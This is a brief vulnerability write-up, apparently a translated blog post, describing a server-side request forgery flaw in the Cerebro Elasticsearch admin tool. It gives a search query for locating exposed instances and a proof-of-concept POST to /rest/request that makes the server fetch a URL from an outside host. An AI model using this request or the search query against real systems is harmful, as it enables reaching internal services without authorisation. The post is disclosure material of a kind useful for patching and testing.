Post

Cerebro Request Ssrf Vulnerability

Cerebro Request Ssrf Vulnerability

Cerebro request SSRF vulnerability

Vulnerability Description

Cerebro is an open source Elasticsearch web visual management tool built using Scala, Play Framework, AngularJS and Bootstrap.

Vulnerability Impact

Cerebro

Network surveying and mapping

app=”Cerebro”

Vulnerability reappears

Main page

img

Send a request packet

1
2
3
POST /rest/request

{"method":"GET","data":"","path":"robots.txt","host":"https://www.baidu.com"}

img

This post is licensed under CC BY 4.0 by the author.